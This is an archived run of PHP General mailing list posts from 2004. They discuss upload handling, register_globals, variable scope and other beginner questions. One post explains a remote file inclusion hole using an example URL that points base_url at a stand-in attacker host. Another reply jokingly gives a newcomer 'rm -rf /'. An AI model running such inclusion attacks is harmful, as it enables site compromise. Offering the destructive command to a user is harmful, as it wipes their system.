
-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

>> Also, you *SHOULD* force the file to be saved on your server
>> with the correct extension. If a user can upload a JPEG with
>> .php on the end, or worse, with php in the middle of the
>> filename, and then your server puts that file in the web tree or
>> otherwise allows it to be executed, *YOU* (and your server
>> admin) screwed up your security, not PHP.
>
> Trusting the name provided by the client is certainly a bad practice, but
> I wouldn't consider "php" in the middle of a filename to be worse than
> extension manipulation. I'm not sure what gave you that idea, but it's
> just not true.

The original article, in another newsgroup/list, referenced a server seen
by that author, where the SysAdmin had configured the server to use PHP to
parse any file whose name contained 'php'.

Not ending in '.php' ('.php$')

Nor even ending in 'php' ('php$')

But containing 'php' ('.*php.*').

phplogo.jpg, when surfed to, went through PHP.

Real-life problem.

Yes, that's a horribly-configured server.

No, I don't think you'd have that on your server.

But I'd bet at least one reader on this list misunderstands the Apache
Files directive (with and without the ~) badly enough that they've got
this gaping hole on their server.

Now combine that with putting uploaded JPEGs in the web tree, and what
have you got?

My grammar in my post incorrectly put the 'or worse' near 'php in the
middle' when it should have been near 'your server ... allows it to be
executed'

The real culprit, is, of course, the mis-configured server.

But it takes two to tango, here, and throwing the JPEGs in the web tree
should not be done unless you *NEED* to do that, for performance, after
due consideration and a security audit to be *SURE* that the JPEGs cannot
ever possibly get executed as PHP.

>> Under *NO* circumstances should a file uploaded by an
>> untrusted user be put into your web tree. You should *KEEP* it
>> outside the web tree, and use PHP to http://php.net/readfile it
>> when it needs to be displayed. Since you are using PHP's
>> readfile function to *READ* the file, Apache won't have any
>> chance to get fooled into thinking it's supposed to be a PHP file
>> and be parsed by PHP.
>
> This is misleading. It is fine to put uploaded files within document root,
> and in fact many applications may require this. Using readfile() is not
> realistic except for small sites - the performance penalty alone makes
> this a poor approach, since it provides very little value.
>
> That being said, it's true that you should not trust the name provided by
> the client (or anything provided by the client), but this is much
> different than blind paranoia. If this perspective were applied to HTML
> forms, no one could use them.

You don't take raw data from HTML forms and save the field values into
your web tree do you?

You scrub the incoming data from the web form and make sure, as much as
possible for the given field, that it is benign, right?  And you certainly
don't http://php.net/eval that untrusted data from a user, do you?

Then why in the world would you take an untrusted, unscrubbable, binary
file and shove it into your web-tree?!

Can you be 100% certain that  is not embedded
in the JPEG?  How?  getimagesize() will tell you the JPEG headers are
kosher, but not confirm that the JPEG itself is really really just JPEG
data.

Even viewing it would only, at best, show you an ugly JPEG.

You could egrep for , and assume that that's not valid in any
JPEG, but it probably actually *IS* valid in at least one real JPEG -- And
if you allow JPEG comments, it would be trivial to have a zillion JPEGs
that would pass any automated validation of JPEG-ness that have PHP code
in the comment.

What's to stop the bad guy from taking a valid JPEG, cramming PHP code
into it, and then surfing to the image directly in such a way that the PHP
code gets executed?

Sure, your server configuration almost for sure doesn't have .jpg files
going through the PHP parser.  But if they can find a way to force that to
happen:
  Altering an .htaccess file somewhere, or forcing one to be uploaded.
  Finding an old cgi-bin setup on the server.
  Getting the CLI PHP to execute the JPG as a script.

It's hard to imagine that last one without them being able to just TYPE a
PHP script, mind you, but some whack 'sudo' setup might do it.  Think
every SysAdmin who uses sudo really understands sudo completely?

Hopefully, none of these things can be done on your server.  If you are
100% certain that none of these could ever possibly occur, then you are
confident that the JPEGs with PHP embedded will only be ugly JPEGs.

But if there is any doubt in your mind that a malicious user could manage
to get the JPEG to be passed through PHP (or Perl or ...) then you've got
a risk there that may not be obvious to the casual
Reader/Sysadmin/Programmer.

Busy servers may have a performance problem with using the readfile
solution -- But that's no excuse to expose that busy server by just
thr

Re: [PHP] PHP Security

[Richard Lynch]

> There are better ways to do this than parsing .jpg files as PHP. One
> obvious one is:
>
> http://example.org/image.php/foo.jpg

I believe this broke on a very very very obscure version of IE -- Maybe
even the re-branded IE I ran into one time [shudder].

In theory, it was just IE X.xx.yy, but it turned out to be *different* for
some case involving rich media.

I cannot for the life of me find the references from my day job four times
removed to prove it, mind you, and maybe it was with PDF and not JPEG, but
at some point, I just don't want to give browsers (or search engines)
*ANY* realistic opportunity to spot ".php" and decide that my dynamic
image is inferior/invalid.

> Another one that I've seen referenced frequently (especially back when
> this was a larger and more common problem) is this:
>
> http://example.org/image.php?iesucks=foo.jpg

In the larger picture of rich media in general, this will fail miserable
for  dynamic PDFs.

If I have to dink around with PATH_INFO for PDFs to behave, I might as
well treat my JPEGs with the same code-base and use:
http://example.com/image/iesucks/foo.jpg
http://example.com/pdf/iesucks/foo.pdf

Too many browsers, too many bugs ==> I'm not letting them waste my time
any more on their stupidity.

I wouldn't recommend that users configure servers to parse *ALL* "*.jpg"
in a directory as PHP, of course.  Ditto for "*.pdf"

But to be sure the browser can't mess up, I'll cheerfully for "image" to
be a PHP script and foo.jpg is just in the PATH_INFO, or for a one-off,
force "progress_meter.jpg" to be a PHP script.

I can't begin to estimate the number of hours I've wasted on browser bugs
with rich media where they browser used the URL to do something incredibly
stupid instead of just taking the valid data being sent and doing the
right thing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Marek Kilimajer]

Richard Lynch wrote:
Matt Palermo wrote:
I am allowing users to imput HTML code into a textarea.  After they input
this, I wany to output their HTML to the browser.  In order for the
document
to be safe, I need to close all open HTML tags that have been left open by
the user, along with any open comments.  Is there a way to take an HTML
string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.
I *think* strip_tags rips out JavaScript.   RTFM to be sure.
not really, but it removes  and  so javascript is not 
interpreted.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

Chris Shiflett wrote:
> --- Greg Donald <[EMAIL PROTECTED]> wrote:
>> http://seclists.org/lists/security-basics/2004/Dec/0080.html
>
> Most of this is actually true.
>
> The one statement that is unclear is the following:
>
> "There are two kinds of flaws :
> - flaws inherent to the php langage itself, as seen before, in file
> uploads.
> - danger in uploading files at all on the server, not dependent
> on the langage used to handle the actual upload, but regarding
> the potential execution of uploaded files."
>
> This may have meant meant hypothetically, meaning that there are two areas
> where flaws could potentially exist - in the language or in the code. If
> this was meant to suggest that there are existing flaws in the language,
> then this is never justified.

I didn't find the statemtn to be unclear:  that kind of flaw can exist,
and it has been seen.

There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.

Now, granted, that flaw was fixed IMMEDIATELY.

And, granted, a SysAdmin who chooses to put Beta software on a server is
responsible for the inherent risks involved.

The point, however, that such potential flaws can exist, and could remain
undetected even now in stable, released code (even PHP) is valid.

I personally don't *believe* such flaws could have survived the scrutiny
after the known problems were suffered by the PHP Development Team.

But I don't think any professionial will claim that it's impossible for
them to exist.

PS
For the inexperienced reader:  This is, as far as I know, the ONLY known
security flaw in actual PHP C source code to get anywhere near release
form.

But PHP is a powerful tool, and there are innumerable ways it can be used,
mis-used, and just plain abused by yourself to make your own server
insecure.

Do the best you can to figure out how and when, and you'll do all right.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question:maybe urldecode

[Stuart Felenstein]

> --- Richard Lynch <[EMAIL PROTECTED]> wrote:
> 
> > Then your new script is broken, as clearly the GET
> > paramters *ARE* there.
> 
> Sorry, I'm not following you.  Where are my GET
> parameters ?  The way I've built my present script
> is
> the reults page is grabbing the parameters.  Do I
> need
> to set up GET parameters in the first/search page ?
> 
> > 
> > Is the new script on a different server or in a
> > different directory? 
> > Perhaps with register_globals turned OFF?
> > 
> No , same server, The new scripts are in a different
> directory then the previous one. They are not
> related
> or call to each other.Register_globals are set to
> ON.
> 
I don't mean to drag this out as I have my work cut
out for me. I did want to add a few more factors that
perhaps is preventing this script from doing the
things I want. 

The first search / results form (the one that works):
a: is really proprietary code which is why I want to
dump it
b: It was created as one page and then I broke the
"grid"(results) portion off, so:
c: In the new scripts the search and results were
created seperately and most of the code is in the
results page. 
What I'm saying is in the search form, all that exists
is the form elements themselves and some resultsets
that feed the multi select lists and menu drop downs.

The results page, has the resultset for formulating
the return records, but it also has the query string
code that grabs the parameters explodes and implodes
them.  
I'm wondering if perhaps I need some of this code in
the search page. 

I wouldn't be throwing this out again, as the scripts
"work", but it's that I need to get the query string
back into the search form and have it display the
parameters there.  I don't even know if that is a
standard function of search pages.  I've done some
googling but have not come up with something that
addresses this type of functionality.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Implementing database cache.

[Richard Lynch]

Bruno B B Magalhães wrote:
> does anybody have am idea of witch are the required functions to
> implement a database query cache? I have a very nice and fast database
> layer, witch I use in all my projects (about 19 sites and a lot of
> others hot-sites and systems like intranet and extranets). Here is my
> idea of the functions:
>
> is_cached();
> read_cache();
> clear_cache();
> write_cache();
>
> And what is the fastest way, shared memory perhaps? And I would have to
> use serialize function to store query results right? and about the
> cache name (or cache_id whatever) I was thinking about using a md5 hash
> of the query itself.
>
> I would love any ideas! :)

1. Rolling your own database cache is probably not a fruitful exercise,
except as a learning experience.  Honest.  The database vendors already
have a cache you can use, and you're not going to beat their performance
with your own in any kind of reasonable development time-frame.

2. You can't serialize the objects, connection, or result, from MySQL
functions.  I'm 100% certain of the connection object, and 99.9% certain
of the result set object.  Those objects go invalid when a script ends, no
matter how you try to save them.  You'll have to suck out all the data and
store that.

3. Shared memory, last time I checked, was a real [bleep] to use because
of a race condition in getting a unique name/semaphore for the storage
space on a server-wide basis.  Maybe this has changed since I last looked,
but back in the day, you were taking the risk that your PHP shared memory
would get trashed by, say, Perl using shared memory.  Or any other
application that wanted to use shared memory.  I *hope* this has been
fixed, for your sake, but be sure you read up on it.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How to make a PHP Socket client crash-proof?

[Richard Lynch]

Have you completely eliminated the possiblity of having a second,
independent, completely unrelated client/socket which is used to *SEND*
data to the server?

client_get <-- server
client_send ---> server

They can both use your local database to share data, to whatever degree
you deem necessary, but having one-way sockets for two different scripts
is way more easier than trying to get a two-way socket to work, in my
(limited) experience.

If you MUST push forward with a two-way socket, try to determine the state
of the world inside your infinite loop.  Why aren't you breaking out of
that loop?  Can you do *anything* to break out?

I suspect that once you have started SENDING data to the server, it's
going to just keep waiting for you to send more.  How do you signal the
end of your data to be sent?  Does the server understand that signal?

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Pass mysql array into SESSION?

[Richard Lynch]

Jerry Swanson wrote:
> I want to pass an array from one page to excell generation page. I
> tried to pass through session($_SESSION['sql'] = $var). But value is
> not set.
>
> The array is actually $result = mysql_query($query);

The result from mysql_query() is not an array.

It's a MySQL result reference.

It is tied, by its nature, to the MySQL link (connection) object from
mysql_connect.

Neither the result objects, nor the link object, can survive the end of a
PHP script, for technical reasons.  Actually, maybe some day somebody can
make this work, but it would be real [bleep].  Plus, you'd really only
want to use this in extreme circumstances, despite the seemingly obvious
bonus of expensive database connections surviving for true re-use.

Anyway, back to the more mundane level of your problem:

Use mysql_fetch_array (or mysql_fetch_row, or whatever) to actually get
the content you need, and you can save that in your session.

Depending on how much data you are saving, and how large the strings are
(War and Peace?) you might actually be better off just re-doing the query
in the next script.  You'll have to test on *YOUR* data on *YOUR* server
to be sure either way.  Too many variables render anybody else's data
(mostly) meaningless.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] fread()

[Richard Lynch]

Russell P Jones wrote:
> Is there any way to use fread() or a similar function to read a section of
> a document NOT starting at the beginning...
>
> for example, I can read the first 1000 bytes of a document with
>
> fread($doc, 1000);
>
> Is there any way to read the second 1000 bytes?
>
> perhaps, fread($doc, 1000, 2000); who knows
>
> or would substr work?

substr would "work" but performance would most likely suck.

Perhaps you are seeking http://php.net/fseek

:-p

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Richard Lynch]

My best guess from skimming your code is that you need:

global $_POST;

in the function that uses $_POST.

Or is $_POST always global anyway?

I always forget, because they changed it around on POST/GLOBALS/etc at
some point, but only on some of them.  Grrr.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Danny Brow]

On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> My best guess from skimming your code is that you need:
> 
> global $_POST;
> 

should I put this at the top of my code with the rest of my variables?

> in the function that uses $_POST.
> 
> Or is $_POST always global anyway?
No. 

> 
> I always forget, because they changed it around on POST/GLOBALS/etc at
> some point, but only on some of them.  Grrr.
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Danny Brow]

On Thu, 2004-12-09 at 15:39 -0500, Roger Spears wrote:
> Danny Brow wrote:
> > On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
> > 
> >>Danny Brow wrote:
> >>
> >>>Below is a snip of a program I am writing, I am a little new to php.
> >>>Any how, I can't for the life me figure out why one of my functions
> >>>cannot grab the item_pics1 variable. I have tried passing the variable
> >>>to the function, tried using $GLOBALS['item_pic1']. So I guess my
> >>>question is, does PHP in some cases need to have a variable in a if
> >>>statement sent back to the global scope? everything works but the
> >>>str_replace item_pics1. Hope this is enough code.
> 
> 
> This may seem a little simple, but it's happened to me.  Are you sure 
> the variable has a value?

Yes, I can do a print $item_pics before and after the function.

dan.

PS. Roger, sorry for sending this to you twice, you sent your reply to directly 
and not to the list.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Danny Brow]

On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> My best guess from skimming your code is that you need:
> 
> global $_POST;
> 
> in the function that uses $_POST.
> 
> Or is $_POST always global anyway?
> 
> I always forget, because they changed it around on POST/GLOBALS/etc at
> some point, but only on some of them.  Grrr.
> 

After reading this again, the function does not use $_POST at all.

here it is again.

function html_template() {
global $item_pics1;
if (file_exists('item.html')) {
print "This is item_pics1" . $item_pics1;
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{item_pictures}', $item_pics1,
$html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
"/item.html";
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= "item.html template does not exsit";
}
}

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[John Nichel]

Richard Lynch wrote:
Chris Shiflett wrote:
--- Greg Donald <[EMAIL PROTECTED]> wrote:
http://seclists.org/lists/security-basics/2004/Dec/0080.html
Most of this is actually true.
The one statement that is unclear is the following:
   "There are two kinds of flaws :
   - flaws inherent to the php langage itself, as seen before, in file
   uploads.
   - danger in uploading files at all on the server, not dependent
   on the langage used to handle the actual upload, but regarding
   the potential execution of uploaded files."
This may have meant meant hypothetically, meaning that there are two areas
where flaws could potentially exist - in the language or in the code. If
this was meant to suggest that there are existing flaws in the language,
then this is never justified.

I didn't find the statemtn to be unclear:  that kind of flaw can exist,
and it has been seen.
There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.

I'm pretty sure Chris is one who doesn't have to dig to find out about 
an old security flaw.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Jason Wong]

On Friday 10 December 2004 04:48, Danny Brow wrote:
> On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> > My best guess from skimming your code is that you need:
> >
> > global $_POST;
>
> should I put this at the top of my code with the rest of my variables?

No

> > in the function that uses $_POST.
> >
> > Or is $_POST always global anyway?
>
> No.

Yes

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #227:

Fatal error right in front of screen
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[John Nichel]

Danny Brow wrote:

function html_template() {
global $item_pics1;
if (file_exists('item.html')) {
print "This is item_pics1" . $item_pics1;
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{item_pictures}', $item_pics1,
$html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
"/item.html";
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= "item.html template does not exsit";
}
}

So what is the function doing or not doing?  If 'index.html' isn't in 
the same directory as the script, it will evaluate to false and the only 
code the function will execute is...

$GLOBALS['errors'] .= "item.html template does not exsit";
Maybe do a print_r ( $GLOBALS ) inside the function to make sure the 
values you're looking for are actually there.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Jason Wong]

On Friday 10 December 2004 04:52, Danny Brow wrote:

OK, you never said what your problem was except to say "everything works but 
the str_replace item_pics1."

Did you check $GLOBALS['errors'] after calling this function?

> function html_template() {
> global $item_pics1;
> if (file_exists('item.html')) {

Is this file supposed to be same as the one below?

> $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
> "/item.html";

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
We are all dying -- and we're gonna be dead for a long time.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[KJ]

OK, apologies on my part, I did not correctly explian the problem which 
can and has arisen from remote includes.

I'll try to explain the problem that I have come across twice in the 
last couple of years both with popular software packages that I 
downloaded like thousands of others and both with exactly the same 
vunerability and both resulted in my site being comprimised and having 
to resort to backups.

The vunerability occurred where both applications had a variable setting 
a base directory of the source code, which was used when including files 
throughout the application, i.e.:

$base_url = '/home/example.com/www';
include_once ($base_url.'/config.php');
In config.php you would then have, for example:

Now in each instance register globals was on and all that was needed to 
comprimise the site was to have a variable passed in the url to set the 
base url to a remote site, which in turn output php to execute, i.e.:

http://example.com/config.php?base_url=http://myhacksite.example.com
Now, you are correct that education on how to avoid this kind of issue 
is key, however that does not avoid the problem. Turning of register 
globals would prevent many of these attacks, however there are still 
many apps out there that require register globals to be on and there are 
other ways to use this exploit with them off.

Now all I'm saying is that given the potential for damage and , from my 
point of view, the little improvement that this feature actually 
provides, why would you NOT have a way of disabling it. I would if I 
could, and I know of others who would as well.

Any thoughts?
KJ
PS: If you gave someone that you didn't trust access to your scripts 
then you're asking for trouble, that was not my point and was not part 
of any kind of thinking towards this request.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] How to post quote/double quote mark?

[Yao, Minghua]

Hi, 

I used the following function to post a string variable "abcdef" to a PHP 
program on another host: 


"/path/to/test.php" on "host/name" is as follows.


It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone 
please tell me how to pass "abcdef" to test.php?
Thanks in advance.

-Minghua

[PHP] Forms and viewing Text Area

[Ben C]

I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Forms and viewing Text Area

[Marek Kilimajer]

Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?
put  tag around it. and don't forget htmlspecialchars():
echo '' . htmlspecialchars($input) . '';
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Forms and viewing Text Area

[John Holmes]

Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?
The line breaks are preserved. If you look at the HTML source of your 
page, you'll see that. HTML does not render line breaks, though, you 
need  tags. So using nl2br() or something similar would work.

--
---John Holmes...
Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/
php|architect: The Magazine for PHP Professionals – www.phparch.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] baffled - please explain

[Malcolm Mill]

Hi, 
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:

function my_function ( )
{
  echo 'My function was called';
}



My function was called


What are those single opening and closing curly braces doing in
separate  tag blocks? What's the point?
The author says "Withing a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewheere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.

If the point is to illustrate what this quote says, does that mean...

{   
?>
My function was called
http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] baffled - please explain

[adwin wijaya]

Malcolm Mill wrote:
Hi, 
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:
function my_function ( )
{
  echo 'My function was called';
}

function my_function ( )
{   
?>
My function was called

}
?>

What are those single opening and closing curly braces doing in
separate  tag blocks? What's the point?
The author says "Withing a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewheere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.
If the point is to illustrate what this quote says, does that mean...
{   
?>
My function was called

}

...is a syntactically correct code block for my_function?
It is correct but it is not suggested.
The author want to show to you instead of using echo 'My function was 
called', you can do in that way.

but
 {
 ?>
 My function was called
 
is not correct :)
best regards
adwin
www.kuya-kuya.net
www.e-rhema.net
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] ISP snippet

[Brad Ciszewski]

i need help to figure out the isp of a user. can anyone help me with this?



-Brad

www.BradTechnologies.com
99.9% Uptime
24/7 Support
Packages as low as 3.50 p/month!
www.BradTechnologies.com

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[I l]

the best security practice is to store the jpg file or any other uploaded 
file in your mySql database. This way you never have to worry about someone 
executing php by the url like www.example.com/pic.jpg. To view the file, the 
user would type www.example.com/veiw.php?fileID=3425433345.

You can also keep information about the file uploaded in your mysql such as 
IP address.

I cann't really see any security problems here.
From: John Nichel <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security
Date: Thu, 09 Dec 2004 15:53:50 -0500
MIME-Version: 1.0
Received: from pb1.pair.com ([216.92.131.4]) by mc5-f30.hotmail.com with 
Microsoft SMTPSVC(5.0.2195.6824); Thu, 9 Dec 2004 13:36:24 -0800
Received: (qmail 37281 invoked by uid 1010); 9 Dec 2004 20:53:56 -
Received: (qmail 36970 invoked by uid 1010); 9 Dec 2004 20:53:55 -
X-Message-Info: JGTYoYF78jEvCuJhLNo8y5HpJ5uTOZsH
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Precedence: bulk
list-help: 
list-unsubscribe: 
list-post: 
Delivered-To: mailing list [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
User-Agent: Mozilla Thunderbird 0.9 (X11/20041103)
X-Accept-Language: en-us, en
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]> 
<[EMAIL PROTECTED]>
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 09 Dec 2004 21:36:24.0772 (UTC) 
FILETIME=[21F88840:01C4DE37]

Richard Lynch wrote:
Chris Shiflett wrote:
--- Greg Donald <[EMAIL PROTECTED]> wrote:
http://seclists.org/lists/security-basics/2004/Dec/0080.html
Most of this is actually true.
The one statement that is unclear is the following:
   "There are two kinds of flaws :
   - flaws inherent to the php langage itself, as seen before, in file
   uploads.
   - danger in uploading files at all on the server, not dependent
   on the langage used to handle the actual upload, but regarding
   the potential execution of uploaded files."
This may have meant meant hypothetically, meaning that there are two 
areas
where flaws could potentially exist - in the language or in the code. If
this was meant to suggest that there are existing flaws in the language,
then this is never justified.

I didn't find the statemtn to be unclear:  that kind of flaw can exist,
and it has been seen.
There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.

I'm pretty sure Chris is one who doesn't have to dig to find out about an 
old security flaw.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] How do you work this thing

[Wil Hitchman]

How does this work?

RE: [PHP] How do you work this thing

[Chris W. Parker]

Wil Hitchman 
on Thursday, December 09, 2004 4:40 PM said:

> How does this work?

It needs two D size batteries.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How do you work this thing

[Rory Browne]

On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker <[EMAIL PROTECTED]> wrote:
> Wil Hitchman 
> on Thursday, December 09, 2004 4:40 PM said:
> 
> > How does this work?
> 
> It needs two D size batteries.
> 
Or three C size batteries, depending on what the heck he is on about.



> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] ISP snippet

[John Nichel]

Brad Ciszewski wrote:
i need help to figure out the isp of a user. can anyone help me with this?
Maybe you can ask the user real nice.
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How do you work this thing

[John Nichel]

Wil Hitchman wrote:
How does this work?
rm -rf /
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How do you work this thing

[Robert Cummings]

On Thu, 2004-12-09 at 19:59, Rory Browne wrote:
> On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker <[EMAIL PROTECTED]> wrote:
> > Wil Hitchman 
> > on Thursday, December 09, 2004 4:40 PM said:
> > 
> > > How does this work?
> > 
> > It needs two D size batteries.
> > 
> Or three C size batteries, depending on what the heck he is on about.

No, no, no, we want to keep the earth clean... a dynamo and pedals ought
to give him an unlimited renewable energy source.

Cheers,
Rob.
-- 
..
| InterJinn Application Framework - http://www.interjinn.com |
::
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for   |
| creating re-usable components quickly and easily.  |
`'

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Spurious newlines when requesting empty php file

[Carl Michael Skog]

Some strange results with spurious newlines inserted in the response when 
requesting a php file has led me to investigating what happens when a 
completely empty php-file is requested.



I would have thought that the response from a empty php file would also be 
empty, but, to my surprise, they consist of 3 newlines !!!



The strange thing is that I observed this behaviour on two completely unrelated 
servers.



Is this what can be expected or is it a result of misconfiguration ?



Kind regards, 

Carl Michael Skog

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] ISP snippet

[Vail, Warren]

I can't help but wonder if an ip trace rte could be used to help identify
